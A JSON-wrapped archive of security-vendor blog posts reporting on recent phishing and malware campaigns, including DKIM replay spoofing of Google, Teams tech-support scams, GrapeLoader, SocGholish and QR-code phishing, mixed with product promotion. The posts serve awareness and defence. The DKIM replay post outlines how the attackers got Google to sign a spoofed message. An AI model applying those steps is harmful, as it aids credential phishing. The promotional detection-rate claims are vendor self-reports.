{
	"id": "b7b9dda2-b2fe-46a1-97ab-90226361ef7c",
	"created_at": "2026-04-06T00:20:04.799517Z",
	"updated_at": "2026-04-10T03:37:33.106715Z",
	"deleted_at": null,
	"sha1_hash": "32e7e9e18d0785cf45592e6d76a9440c5d0d2d46",
	"title": "Blog Archive - SpamTitan Email Security",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1667639,
	"plain_text": "Blog Archive - SpamTitan Email Security\r\nBy G Hunt\r\nArchived: 2026-04-05 19:50:54 UTC\r\nDKIM Replay Phishing Attempt Spoofs Google and Passes Validation Checks\r\nby | April 30, 2025 | Phishing \u0026 Email Spam\r\nHackers have exploited a ‘vulnerability’ to conduct a phishing campaign that made it appear that the phishing\r\nemail had been sent by Google from the no-reply[@]accounts.google.com address. The email was signed by\r\nGoogle and passed the DomainKeys Identified Mail (DKIM) authentication check, suggesting the email had been\r\nsent from a genuine Google account and was authentic, although the email had been sent from a different, non-Google address.\r\nThe campaign was identified by developer Nick Johnson, who received an email seemingly sent from no-reply[@]accounts.google.com with the subject Security Alert. The email claimed that Google LLC had been\r\nsubpoenaed to obtain a copy of the contents of his Google account and that a support case had been opened and\r\ntransferred to Legal Investigations Support. A support reference number was included along with a link to a\r\nGoogle Sites website, encouraging him to click the link to examine the case materials and “submit a protest,” if\r\nnecessary, via the option on the support website.\r\nThe lure used in this phishing attempt is similar to many other phishing campaigns that threaten legal action or\r\nwarn about police investigations, although what makes the attempt stand out is how the phisher managed to make\r\nthe email appear to have been sent by Google and pass the DKIM authentication check, resulting in the email\r\nbeing delivered to his inbox.\r\nWhile the subject matter was potentially serious, and the email had seemingly been sent by Google, there was a\r\nred flag that suggested a phishing attempt. 
As was noticed by Johnson, the link in the email did direct him to an\r\nofficial Google site, but it was sites.google.com, a free web-building platform provided by Google for users to\r\ncreate and host free web pages for personal purposes. No official email from Google would direct a user to that\r\nplatform, and certainly not any message about a subpoena requiring the disclosure of the contents of their Google\r\nemail account. The link directed Johnson to a fake support portal – a carbon copy of the official support portal,\r\nwhich had been scraped from the official site. The aim of the phish appears to have been to trick Johnson into\r\nlogging in and disclosing his login credentials, allowing his Google account to be hijacked.\r\nAn analysis of the phishing attempt revealed Google was tricked into signing the email, thus allowing the message\r\nto bypass spam filtering services, since the email successfully passed the DKIM and DMARC authentication\r\nchecks. Closer inspection of the message header revealed the mailed-by address was different from the from\r\naddress, and that the message had been sent in what is known as a DKIM replay attack.\r\nThe message was actually sent to a me@ address at a domain that appeared to be managed by Google. According\r\nto Johnson, the attackers registered a domain and created a Google account for me[@]domain.com, then\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 1 of 136\n\ncreated a Google OAuth app and used the entire phishing message for its name, which was then added to the name\r\nfield. They granted themselves access to the email address in Google Workspace, then Google sent an alert to the\r\nme[@]domain.com account. 
The email was then forwarded to Johnson, and since the email had been generated by\r\nGoogle, it was able to pass the DKIM check as the parts of the message that DKIM checks had not been altered.\r\nThe vulnerability that was exploited was the fact that DKIM checks the message and the headers, not the\r\nenvelope, which meant the email passed the validation checks because it had a valid signature. Since the exact\r\nemail was extracted and saved without making any modifications to what was signed by DKIM, the validation\r\nchecks were passed. Further, since the email was sent to a me@ email address, it shows that the message was\r\ndelivered to the victim’s email address. Google explained in response to a query that it is aware of the phishing\r\nattempt and has rolled out protections to prevent further abuse.\r\nThe phishing attempt demonstrates the importance of stopping and thinking before clicking on any link in an\r\nemail, no matter how serious the potential threat. The phishing attempt could have easily led to a compromised\r\nGoogle account had he not stopped to think about the request. Others may not have been as fortunate. While this\r\nwas the first time that Google is known to have been affected by a DKIM replay attack, it is a known phishing\r\ntechnique and one that can be highly effective.\r\nSecurity awareness training should make it clear that all emails can potentially contain a threat, even if the sender\r\nappears to be legitimate. Phishing lures related to legal threats, police investigations, and subpoenas should be\r\nincluded in the training as these are likely to create the fear that leads to a rapid click, and employees should be\r\ntold to inspect the message headers to see the sender’s address and told to report any potential threat or suspicious\r\nemail to their security team. 
They should also be provided with an easy one-click method of doing so in their\r\nemail client.\r\nBusinesses should also ensure they have advanced anti-spam software with email sandboxing and URL filtering,\r\nand have multifactor authentication set up for all email accounts, with phishing-resistant multifactor\r\nauthentication implemented when possible for the greatest protection.\r\nMicrosoft Teams Used in Tech Support Scam Targeting Female Executives\r\nby G Hunt | April 28, 2025 | Security Awareness\r\nA new campaign has been identified that abuses Microsoft Teams to deliver malware in a tech support scam,\r\nwhere the user is tricked into believing they need assistance to resolve a technical issue that requires them to grant\r\naccess via the built-in Microsoft remote monitoring and management tool, Windows Quick Assist.\r\nTech support scams are a very common form of cybercrime. According to the FBI’s Internet Crime Complaint\r\nCenter (IC3), 36,002 complaints were received about tech support scams in 2024, making it the 6th most\r\ncommonly reported cybercrime, and the third biggest cause of losses, with more than $1.46 billion lost to the\r\nscams in 2024 alone. It should be noted that many victims fail to report these scams to the FBI, so the number of\r\nvictims and the losses are likely to be substantially higher.\r\nWhile the companies impersonated are highly varied, these scams typically involve contact being made with the\r\nvictim, with the scammer impersonating a member of the technical support team to resolve a fictitious technical\r\nissue. 
To make these scams more realistic, threat actors may add a targeted individual to numerous newsletters and\r\nspam sources, and then call to help them resolve the spam problem that the threat actor has created.\r\nOne of the latest scams saw contact made via Microsoft Teams on targets in the services sector, including finance,\r\nprofessional, and scientific services. One common denominator was that the targeted individuals all had female-sounding names, most of whom were executive-level employees. The scam was also conducted at specific times,\r\nbetween 2 p.m. and 3 p.m. local time, which the threat actors perceived would be the ideal time when attention\r\nwould likely be reduced and the scam was most likely to succeed.\r\nThe Teams request was accompanied by a vishing call. Over the phone, the target was convinced to run a\r\nPowerShell command that was delivered via a Microsoft Teams message, which downloaded the first-stage\r\npayload. The QuickAssist tool was used by the threat actor for remote access to ensure the deployment of\r\nPowerShell, all under the guise of resolving a fictitious technical issue.\r\nThe threat actor used QuickAssist to deliver a signed file named Team Viewer.exe to a hidden folder, with that\r\nexecutable likely to be undetected as it would be hidden in normal system activity. The file was used to sideload a\r\nmalicious DLL called TV.dll, which was used to deliver a second-stage JavaScript-based backdoor, providing\r\npersistent access to the user’s device. Persistence was achieved by modifying Registry entries.  The campaign was\r\nidentified by a ReliaQuest researcher and was attributed to a tracked threat actor that uses vishing attacks to infect\r\nusers with malware, often leading to a ransomware attack. 
One method of blocking these attacks is to configure\r\nMicrosoft Teams to block external communications to prevent the initial contact, and if Windows Defender is\r\nused, to set it to the most restrictive setting to limit the use of PowerShell.\r\nUltimately, this scam succeeded because an end user was contacted, and social engineering techniques were used\r\nto trick them into taking the actions that the threat actor could not otherwise have performed externally. The\r\nrecently published Verizon Data Breach Investigations Report revealed that 60% of data breaches involved the\r\nhuman element, with social engineering one of the most common ways that employees are tricked. It is not\r\nnecessary for threat actors to spend countless hours trying to find zero-day vulnerabilities in software solutions\r\nwhen they can just contact employees and get them to provide the access they need.\r\nAs the IC3 data shows, these scams are lucrative for threat actors, and one of the reasons why they are so\r\nsuccessful is that they tend to take place over the phone, bypassing the need to defeat anti-spam software and\r\nother technical security measures. Since legitimate remote access tools are used, the malicious activity is easy to\r\nhide within normal system activity.\r\nSecurity awareness training can go a long way toward improving defenses against these types of scams.\r\nExecutives were targeted in this campaign as they have higher-level privileges than other workers, but security\r\nawareness training is often less robust at the executive level. 
It is important to ensure that all members of the\r\nworkforce, from the CEO down, are provided with security awareness training, and for the training courses to be\r\ntailored to different roles and the specific threats that each is likely to encounter.\r\nWith the SafeTitan security awareness training platform, it is easy to create tailored training programs for different\r\nmembers of the workforce and the unique threats that they face, including specific programs for the CEO and\r\nexecutives, the HR department, and the IT team. With the SafeTitan platform, there are hundreds of training\r\nmodules tailored to different aspects of cybersecurity and different threats, making it quick and easy to create and\r\ndeliver highly effective training courses covering phishing and other email-based attacks, smishing, vishing, and\r\nother cyber threats.\r\nGive the TitanHQ team a call today for more information on improving your cybersecurity defenses and security\r\nawareness training programs. All TitanHQ solutions are available on a free trial, with support provided to make\r\nsure you get the most out of your trial.\r\nThe Human Element is Involved in 60% of Data Breaches\r\nby G Hunt | April 26, 2025 | Phishing \u0026 Email Spam\r\nThe latest data from Verizon has revealed that phishing was the third most common method of initial access in the\r\ndata breaches the firm analyzed for its 2025 Data Breach Investigations Report. Phishing accounted for 16% of all\r\ndata breaches in 2025, having been overtaken by vulnerability exploitation (20%). The leading initial access\r\nmethod was credential misuse, which was involved in 22% of data breaches. Verizon does note, however, that\r\nwhile incident responders may identify compromised credentials as the cause, it is not always clear how those\r\ncredentials were obtained. 
It is possible that they were obtained in a previous phishing attack that went undetected,\r\nso phishing may have been involved in a higher percentage of data breaches.\r\nThe report highlights the extent to which cybercriminals exploit human weaknesses. The human element was\r\ninvolved in approximately 60% of data breaches in 2024, down slightly from the 61% of data breaches the\r\nprevious year. The human element could involve a click on a link in a phishing email, resulting in the theft of\r\ncredentials, a visit to a malicious website where malware is downloaded, a misconfiguration that is exploited, or a\r\nresponse to a phone call or text message. In 32% of data breaches, the human element was ascertained to result in\r\ncredential abuse, 23% involved social interactions, 14% involved errors, and 7% involved interactions with\r\nmalware.\r\nThis year’s report delves into the importance of security awareness training and how providing regular training\r\ncan really make a difference to an organization’s security posture, especially when combined with phishing\r\nsimulations. Providing training to the workforce will teach employees about security best practices, which will\r\nhelp to eradicate risky behaviors. Employees should be taught how to identify a phishing email and be conditioned\r\nto report any suspicious emails to their security team immediately. Phishing simulations help to reinforce training\r\nand identify individuals who have failed to apply the training. If an individual fails a phishing simulation, they can\r\nbe provided with additional training to help ensure they do not make a similar identification error in the future.\r\nThe report revealed that out of the companies that provided security awareness training and conducted phishing\r\nsimulations, there was a much higher reporting rate when employees had received training more recently. 
The\r\nbaseline reporting rate was 5%, which shot up to 21% with recent training.\r\nThe data shows why it is so important to provide ongoing security awareness training to keep cybersecurity\r\nmatters fresh in the mind. It is also important to incentivize employees to report potential phishing emails rather\r\nthan punish those who don’t, and to clearly explain that reporting suspicious emails helps security teams to\r\ncontain threats more quickly and limit the damage. It is also important to make it as easy as possible for\r\nemployees to report potential threats. Ideally, employees should be able to report a potential phishing or scam\r\nemail with a single click in their email client.\r\nTitanHQ offers an email security suite that includes the SpamTitan cloud-based anti-spam service and the\r\nPhishTitan phishing prevention and remediation solution for Microsoft 365 users. SpamTitan incorporates dual\r\nanti-virus engines for detecting known malware, email sandboxing for detecting novel threats, AI and machine learning algorithms for identifying phishing and spam emails, plus SPF, DKIM \u0026 DMARC, allow listing,\r\nblocking, greylisting, and dedicated real-time block lists. An email client add-in is also provided to allow\r\nemployees to easily report potential threats.\r\nThe PhishTitan solution is based on the same engine that powers SpamTitan, incorporating AI and machine\r\nlearning to detect phishing threats, and also adds banner notifications for emails to warn employees about\r\npotential threats from external email addresses. The remediation tools provided by PhishTitan allow security\r\nteams to rapidly respond to threats and eliminate them from their email system.\r\nBoth email security solutions have high detection accuracy and provide best-in-class protection from email\r\nthreats. 
In recent independent tests at VirusBulletin, the solutions were demonstrated to have exceptional detection\r\naccuracy, blocking in excess of 99.99% of spam and phishing threats, and thanks to the email sandbox service,\r\nTitanHQ’s solutions blocked 100% of malware.\r\nTitanHQ can also help with security awareness training and phishing simulations. The SafeTitan platform makes it\r\neasy to create and automate continuous security awareness training programs for the workforce. The training\r\ncontent is enjoyable and interactive and is delivered using computer-based training, with individual modules\r\ntaking no more than 10 minutes to complete.\r\nThe training content is regularly updated and has been proven to improve security awareness and reduce\r\nsusceptibility to cyber threats, especially when combined with TitanHQ’s phishing simulator. Internal simulated\r\nphishing campaigns can be created and automated, and will automatically generate additional training\r\nimmediately in response to a security failure, ensuring training is delivered at the time when it is most likely to be\r\neffective.\r\nThrough security awareness training and phishing simulations, organizations can reduce the employee errors that\r\ncause so many data breaches, and by using TitanHQ’s email security suite, threats will be blocked before\r\nemployees’ security awareness is put to the test.\r\nGive the TitanHQ team a call today to discuss the best options for improving your defenses. 
All TitanHQ solutions\r\nare available on a free trial and assistance can be provided to help you get the most out of the free trial.\r\nUK Government Survey Confirms Phishing is the Biggest Threat to UK Businesses\r\nby G Hunt | April 25, 2025 | Phishing \u0026 Email Spam\r\nA recently published report commissioned by the UK’s Home Office and Department for Science, Innovation and\r\nTechnology (DSIT) has revealed that 43% of UK businesses and 30% of UK charities experienced a cybersecurity\r\nbreach in the past 12 months.\r\nWhile there was a slight fall in the number of businesses and charities suffering a cybersecurity incident, there was\r\na significant increase in ransomware attacks. The survey was conducted on 2,180 businesses, 1,081 charities, and\r\n574 educational institutions. Based on the number of confirmed cyber incidents, that equates to around 612,000\r\nUK businesses and 61,000 UK charities experiencing a cyber breach or a cyberattack in the past 12 months.\r\nWhile there was a slight decline in cyber incidents, which were confirmed by 50% of businesses in last year’s\r\nstudy, it is clear that hacking and other types of cyber incidents continue to pose a massive threat to UK\r\nbusinesses, with ransomware attacks of particular concern. According to the report, the estimated percentage of\r\nransomware crime increased from less than half a percent in 2024 to 1% in 2025, which suggests that around\r\n19,000 UK businesses experienced a ransomware incident in the past 12 months. 4% of large businesses and 3%\r\nof medium-sized businesses admitted to paying the ransom demand to recover their data and prevent its\r\npublication online.\r\nThe biggest cyber threat to UK businesses by some distance is phishing. 
Phishing is the fraudulent practice of\r\nsending emails or other messages that trick individuals into disclosing sensitive information such as login\r\ncredentials or installing malware. Over the past 12 months, 93% of businesses and 95% of charities that\r\nexperienced a cybercrime incident identified phishing as the cause of at least one of those incidents. Businesses\r\nthat were confirmed victims of cybercrime in the past 12 months experienced an average of 30 cybercrime\r\nincidents over that period, with charities experiencing an average of 16 cybercrime incidents.\r\nThe credentials stolen in these attacks and the malware installed give cybercriminals initial access to internal\r\nnetworks. From there, they can deploy additional malware payloads and ransomware and steal sensitive data. The\r\nphishing problem is also getting worse for businesses, as cybercriminals are leveraging large language models\r\n(LLMs) to craft extremely convincing phishing emails and conduct phishing attacks at scale. These tools can be\r\nused to generate fake images, make phishing lures more believable, and make them harder to detect.\r\nWith phishing such a major threat and the high cost of dealing with each phishing incident, UK businesses and\r\ncharities need to have email security defenses capable of detecting and blocking phishing threats, including those\r\ndeveloped using AI and LLMs.\r\nPhishing defenses should consist of anti-spam software, multifactor authentication, and end user security\r\nawareness training as a minimum. 
Advanced email filtering software incorporates antivirus software to identify\r\nknown malware threats, email sandboxing for detecting novel malware threats, link scanning, and machine\r\nlearning and AI-aided detection.\r\nOver the past three quarters, SpamTitan from TitanHQ has consistently demonstrated in independent tests that it is\r\ncapable of blocking even the most advanced threats, routinely achieving a 100% malware detection rate, and\r\nphishing and spam detection rates in excess of 99.99%.\r\nTitanHQ also offers a comprehensive security awareness training and phishing simulation platform – SafeTitan –\r\nfor improving awareness of cyber threats. When combined with phishing simulations, the platform has been\r\nshown to reduce employee susceptibility to phishing by up to 80%. The training content is enjoyable and\r\nmemorable, and is delivered in training modules of no more than 10 minutes to maximize knowledge retention\r\nand make training easy to fit into busy workflows.\r\nAll TitanHQ solutions have been developed to provide powerful protection and advanced features, while also\r\nbeing easy to set up, configure, and use. Further, they are available at a price point that is affordable for businesses\r\nof all sizes. Give the TitanHQ team a call today to find out more about improving your defenses against phishing\r\nand other cyber threats. Further, TitanHQ’s cloud-based anti-spam service and security awareness training\r\nplatform are available on a free trial, allowing you to put them to the test before making a purchase decision.\r\nWine-Tasting Phishing Emails Used to Target Embassy Staff in Malware Campaign\r\nby G Hunt | April 24, 2025 | Phishing \u0026 Email Spam\r\nA phishing scam has been identified targeting staff of European embassies with an invitation to a fake wine-tasting\r\nevent. 
Targets include European diplomats and the staff of non-European countries at embassies located in\r\nEurope. The campaign has been linked to the Russian state-sponsored hacking group, Cozy Bear (aka APT29,\r\nMidnight Blizzard), and is believed to be primarily an espionage campaign.\r\nThe aim of the campaign is to deliver a stealthy new backdoor malware dubbed GrapeLoader. The campaign,\r\nidentified by Check Point, is believed to be part of a wider campaign targeting European governments, diplomats,\r\nand think tanks. The malware delivered in the campaign serves as a loader for delivering additional payloads and\r\nis used as an initial stage tool for fingerprinting and establishing persistence.\r\nAs is typical with spear phishing campaigns, considerable effort has been put into creating a lure that is likely to\r\nelicit a response. A fake diplomatic event is used, commonly related to wine tasting, with some emails offering a\r\nplace at a diplomatic dinner. The messages were sent by a specific individual at a legitimate but impersonated\r\nEuropean foreign affairs ministry. A series of follow-up messages is sent to individuals who failed to respond to\r\nthe fake invite. The phishing link is also configured to redirect the user to the real foreign ministry website if it is\r\nopened outside of the expected timezone or by an automated tool.\r\nThe emails prompt the recipient to click on an embedded hyperlink that directs them to a spoofed website where\r\nthey are prompted to download a file. If successful, the user downloads a zip file containing a PowerPoint\r\nexecutable file called wine.exe, and two hidden DLL files, one of which allows the PowerPoint file to run. The\r\nPowerPoint file is used for DLL sideloading, including the other DLL file, dubbed GrapeLoader, which is used to\r\ndeliver additional payloads. GrapeLoader fingerprints the device and establishes contact with its command-and-control server. 
A Run registry key is added to ensure that wine.exe is executed following a reboot.\r\nThe malware has been designed to be stealthy, including masking strings in its code and only decrypting them for\r\na short time in memory before they are erased. This technique prevents analysis using tools such as FLOSS.\r\nThe malware also makes memory pages temporarily inaccessible to evade antivirus scans. GrapeLoader is thought\r\nto lead to the delivery of a modular backdoor known as WineLoader, which has been used in previous Cozy Bear\r\ncampaigns on governments and political parties.\r\nGetShared and Other Legitimate Services Abused in Phishing Campaigns\r\nby G Hunt | April 22, 2025 | Phishing \u0026 Email Spam\r\nOne of the common tactics for getting phishing emails into inboxes is to use a legitimate service to send the\r\nemails, as the messages are far less likely to be blocked by email security solutions. Email security solutions\r\nperform reputation checks on email addresses and domains, and if they are determined to have been used for\r\nspamming or sending malicious emails, they are rapidly added to real-time blocklists (RBLs). If a sender falls below a certain\r\ntrustworthiness threshold, the messages will be blocked and quarantined, ensuring they do not reach\r\ntheir intended targets.\r\nThese reputation checks are often passed if emails are sent via trusted services such as Dropbox and Google\r\nCalendar, and similarly if malicious files or content are hosted on legitimate services such as OneDrive, GitHub,\r\nGoogle Drive, or SharePoint. The fact has not been lost on threat actors, who regularly abuse these services.\r\nFake login pages may be hosted on cloud storage services, and malicious files shared through them. 
Not only can\r\nthese emails evade checks due to the good reputation of the sites, these well-known brands are familiar to end\r\nusers and are often trusted, increasing the probability that credentials will be divulged or files will be downloaded.\r\nFor instance, a recent campaign abusing Dropbox used the platform to send an email about a shared file, which\r\nwas also hosted on a legitimate Dropbox account. The email contained a link to a malicious PDF file, branded\r\nwith the details of a company known to the targeted employees. The PDF file contained a link to another,\r\nunrelated website, where a malicious file was hosted. The phishing emails used a plausible lure to convince the\r\nuser to click the link and download and execute the file.\r\nA new campaign has recently been identified that uses a different legitimate service to evade reputation checks.\r\nThe campaign, detected by security researchers at Kaspersky, was sent via a service called GetShared. While not\r\nas well-known as Google Calendar or Dropbox, the platform had a vulnerability that could be abused to send\r\nemails from a trusted domain and file-sharing service.\r\nSimilar to the Dropbox campaign, GetShared was used to send an email to targeted individuals advising them that\r\na file had been shared with them via GetShared, as it was too large to send via email. The use of the file-sharing\r\nservice seems reasonable, and the urgency was believable. The user was told that the file would be deleted after a\r\nmonth, and they were asked to provide a quote including the delivery time and payment terms. One of the\r\nintercepted emails targeted a designer using a shared file called DESIGN LOGO.rar.\r\nThe user was given a download button, which links to the site where the file can be downloaded. If the\r\ncompressed file is opened and the contents extracted, there are several possible attack methods. 
The compressed file\r\ncould contain an executable with a double file extension, making it likely that the file would be executed.\r\nPotentially, the file could contain a link to a malicious document or phishing page, although in this case, it was\r\npart of a vishing campaign. The compressed file contained contact details for the user to call, and the call would lead to\r\na file download or the disclosure of credentials or other sensitive information.\r\nEarlier this year, a campaign was identified that used Google Calendar, with the emails sent through the platform\r\ncontaining a calendar invite. The invite is automatically added to the user’s Google Calendar account if they have\r\nCalendar set up and configured to automatically accept invitations. The invite contained a link to Google Forms or\r\nGoogle Drawings, which contained a link to a phishing website. That website impersonated a well-known brand\r\nand required the user to log in with their credentials. The campaign targeted more than 300 brands including\r\nhealthcare providers, educational institutions, banks, and others, and involved thousands of emails.\r\nTraditional email security solutions are unlikely to block emails from these trusted senders, and malicious files\r\nhosted on trusted platforms are also unlikely to be blocked. Businesses can combat these types of phishing attacks\r\nby using an advanced email spam filter that incorporates AI and machine learning algorithms and email sandboxing\r\nin addition to the standard reputation checks and blacklists. 
The best spam filters for businesses provide multiple\r\nlayers of protection to block these malicious emails and prevent them from reaching inboxes; however, due to the\r\ndifficulty in distinguishing genuine from malicious communications from legitimate platforms, security awareness\r\ntraining is vital.\r\nEmployees should be trained on how to identify phishing emails and told not to trust emails from legitimate\r\nplatforms, as while the platforms can be trusted, the content cannot. It is also recommended to use a phishing\r\nsimulator to run simulations of phishing using lures that abuse trusted platforms to gauge how employees respond\r\nand provide targeted training to individuals who are tricked by these campaigns.\r\nSocGholish Malware Used to Deliver RansomHub Ransomware\r\nby G Hunt | March 31, 2025 | Internet Security, Phishing \u0026 Email Spam, Security Awareness\r\nRansomHub is one of the most prolific ransomware-as-a-service (RaaS) groups now that the ALPHV/BlackCat\r\noperation has shut down and the LockBit operation has been hit with successive law enforcement actions.\r\nRansomHub engages in double extortion tactics, exfiltrating sensitive data from victims’ networks and encrypting\r\nfiles. Victims must pay to obtain the keys to decrypt their data and to prevent the publication of the stolen data on\r\nthe RansomHub data leak site. Since emerging in early 2024, the group has conducted more than 200 attacks.\r\nAs a RaaS operation, RansomHub uses affiliates to conduct attacks in exchange for a percentage of any ransom\r\npayments they generate. The affiliates each have their specialties for breaching victims’ systems, including\r\nphishing, remote desktop protocol attacks, and the exploitation of unpatched vulnerabilities. 
Now, a new tactic is\r\nbeing used – the group is using the SocGholish malware-as-a-service (MaaS) framework for initial access,\r\nespecially in attacks on the government sector.\r\nSocGholish, also known as FakeUpdates, uses an obfuscated JavaScript loader that is primarily delivered via\r\ncompromised legitimate websites. Once a website has been compromised, malicious scripts are added that redirect\r\nusers to webpages that display browser update notifications. These sites use social engineering to trick visitors\r\ninto downloading a browser update, as they are told that their browser has a security issue or is not functioning\r\ncorrectly. If the user agrees, they download a zip file that contains a JavaScript file. If that file is executed,\r\nSocGholish malware is installed.\r\nSocGholish is a malware downloader that provides initial access to a victim’s network. The malware has been\r\nused to deliver a wide range of payloads, including AZORult, Gootloader, NetSupport, and Dridex. SocGholish\r\nhas also previously been used to deliver DoppelPaymer ransomware, and now RansomHub ransomware. In the\r\ncase of RansomHub, the group deploys Python-based backdoor components for RansomHub affiliates to use for\r\ninitial access.\r\nPreventing SocGholish infections is critical to preventing RansomHub ransomware attacks; however, prevention\r\nrequires a defense-in-depth approach. Traffic to the compromised websites can come from emails that include\r\nembedded hyperlinks, from malvertising, and from SEO poisoning; links to compromised websites are also delivered\r\nto users via Google Alerts. The webpages that host the fake browser updates filter traffic, blocking access by\r\nsandboxes, which can make detection difficult.\r\nThe best approach is to use advanced anti-spam software such as SpamTitan to block malicious emails. 
In the\r\nlast quarterly round of testing at VirusBulletin, SpamTitan, a cloud-based antispam service from TitanHQ, ranked\r\n#1 for malware detection, phishing detection and spam blocking with a 0% false positive rate, and in the February\r\n2025 tests, achieved a perfect score blocking 100% of malware, phishing, and spam emails. The high detection\r\nrate is due to extensive front-end tests, email sandboxing, and machine learning.\r\nA web filter adds an important layer of protection by scanning websites for malicious content and blocking access\r\nto known malicious websites. The WebTitan DNS filter is fed extensive threat intelligence to block access to\r\nknown compromised webpages, can filter websites by category, and can be configured to block downloads of\r\nexecutable files from the Internet. Security awareness training is vital for creating a human firewall. Employees\r\nshould be informed about the risks of interacting with security warnings on the Internet, and taught how to\r\nidentify phishing attempts and be instructed on security best practices. The SafeTitan security awareness training\r\nplatform and phishing simulator platform make creating and automating training courses and phishing simulations\r\na quick and easy process.\r\nQR Code Phishing Scam Requests Verification of Tax Information\r\nby G Hunt | March 31, 2025 | Phishing \u0026 Email Spam\r\nOne of the ways that cybercriminals are bypassing traditional email security solutions is to use QR codes rather\r\nthan embedded hyperlinks in their phishing emails. QR codes are increasingly used by businesses to drive traffic\r\nto web pages, as consumers do not need to go through the process of typing a URL into their browser. 
The QR\r\ncode can simply be scanned with a smartphone camera, the URL will be recognized, and the web resource can be\r\nvisited with a single tap of the finger.\r\nSpam filtering services will detect links in emails, check them against blacklists of known malicious websites, and\r\nwill often follow the links to find the destination URL. If the website is malicious, the email will not be delivered\r\nto the user’s inbox. By using a QR code rather than a hyperlink, there is an increased chance that the message will\r\nbe delivered, as many anti-spam software solutions are incapable of reading QR codes.\r\nOne such campaign has recently been identified that warns the recipient that they must review and update their tax\r\nrecords. The email has the subject, “urgent reminder,” and claims to have been sent by the Tax Services Team. The\r\nemail has a PDF file attachment and advises the recipient that a review of their tax records must be completed by\r\nApril 16, 2025, to avoid potential penalties. Tax season is well underway and annual tax returns need to be\r\nsubmitted by April 15, 2025, so the deadline for a response is plausible.\r\nRather than include a link, the PDF file includes a QR code, which the user is told they should scan with their\r\nmobile device to access the secure tax portal, where they must log in, review their tax information, and confirm it\r\nis up to date.\r\nIf the QR code is scanned and the link followed, the user must first pass a CAPTCHA test, after which they are\r\npresented with a Microsoft login prompt and asked to enter their password. The form is already populated with the\r\nuser’s email address to make it appear that the user is known or has visited the site before, adding an air of\r\nlegitimacy to the scam. 
If the password is entered, it will be captured and used to hijack the user’s Microsoft\r\naccount. After entering the password, the user is told “We could not find an account with that username. Try\r\nanother account,” which may allow the attacker to steal credentials for another account.\r\nQR code phishing forces users onto a mobile device, which typically has weaker security than a desktop computer\r\nor laptop, plus only the domain name can usually be viewed rather than the full URL, which helps to make the\r\nlink seem legitimate. Phishers also often use open redirects on legitimate websites to make their links appear\r\nauthentic and hide the final destination URL.\r\nWith QR code phishing scams on the rise, it is important to raise awareness of the threat through your security\r\nawareness training program. Employees should be warned that QR codes are commonly used by threat actors, and\r\nnever to follow links encoded in QR codes that arrive via email. It is also recommended to use a phishing\r\nsimulator to assess whether the workforce is susceptible to QR code phishing attempts. The SafeTitan security\r\nawareness training platform allows businesses to easily conduct phishing simulations on the workforce to gauge\r\nsusceptibility to phishing threats. The phishing simulator will generate relevant training content immediately if a\r\nphishing test is failed, ensuring targeted training content is delivered immediately, when it is likely to be most\r\neffective at correcting behavior.\r\nTechnical defenses should also be implemented. An advanced spam filtering service should be used that is capable\r\nof identifying QR codes and following and assessing URLs for phishing content and malware. The outbound spam\r\nfilter of SpamTitan is capable of following QR codes and assessing content, and in recent tests, correctly identified\r\n100% of phishing attempts. 
SpamTitan also includes email sandboxing for in-depth analysis of email attachments.\r\nA DNS security solution is also recommended for in-depth analysis of URLs for malicious content to provide an\r\nextra layer of protection against phishing and malware.\r\nNew Phishing Kit Dynamically Displays Relevant Landing Pages Based on DNS\r\nQueries\r\nby G Hunt | March 30, 2025 | Phishing \u0026 Email Spam\r\nA new phishing-as-a-service (PhaaS) platform has been identified that highlights the sophistication of phishing\r\nattacks, and how even cybercriminals with limited skill sets can conduct extremely effective phishing campaigns.\r\nOne of the problems when conducting phishing campaigns is ensuring the phishing emails are convincing.\r\nPhishing has traditionally been a numbers game, where large volumes of messages are sent in the knowledge that\r\na small number of individuals will be tricked into responding. Those individuals may simply be busy and respond\r\nwithout taking the time to carefully consider what they are being asked, or individuals with poor security\r\nawareness. Targeted phishing attempts, termed spear phishing, involve research and are tailored to individuals or\r\nsmall numbers of individuals, and because of the targeting, there is a much higher response rate. The trade-off is\r\nthat these campaigns involve considerable time and effort.\r\nThe new PhaaS platform allows a threat actor to tailor the content to display a fake login page relevant to the\r\nindividual receiving the message, while still sending a large volume of phishing emails. The phishing kit allows\r\nindividuals to be tricked by displaying a login prompt that impersonates any of 114 brands in around a dozen\r\ndifferent languages, with the content displayed tailored to each individual. 
The threat actor configures the phishing\r\ncampaign, sends out phishing emails via the PhaaS kit, and the link in the email directs the recipient to a phishing\r\nwebpage. The next stage is where the targeting occurs. The phishing kit queries the DNS MX records of the\r\nrecipient’s email domain via DNS over HTTPS (using the Cloudflare or Google resolvers) to identify the user’s\r\nemail service provider. The phishing page is then dynamically displayed based on the results of that query, and if\r\nno response is received, the phishing page defaults to Roundcube.\r\nDNS queries are fast, so the query and response occur in a fraction of a second, as is the case when a DNS query\r\nis sent to identify the IP address of a webpage when browsing the internet. As such, there is only a very small\r\ndelay, often unnoticeable to the user, before the content is loaded. The result is that if the user’s email service\r\nprovider is Gmail, they will be presented with a Gmail login prompt, and if they use Microsoft Outlook, they will\r\nbe presented with a Microsoft login prompt. If the user responds and enters their login credentials, they are\r\ncaptured and sent to the collection server, and the user is redirected to the real login page for that service, most\r\nlikely unaware that they have been phished. The phishing campaign was identified by Infoblox, which identified\r\nthousands of phishing emails sent via the kit. While the kit appears to have been first used in 2020, since then the\r\nnumber of brands being impersonated has increased considerably, with support also provided to target users in\r\nseveral languages.\r\nThe phishing kit demonstrates the sophistication of phishing attacks and how threat actors are increasing the\r\neffectiveness of their campaigns. 
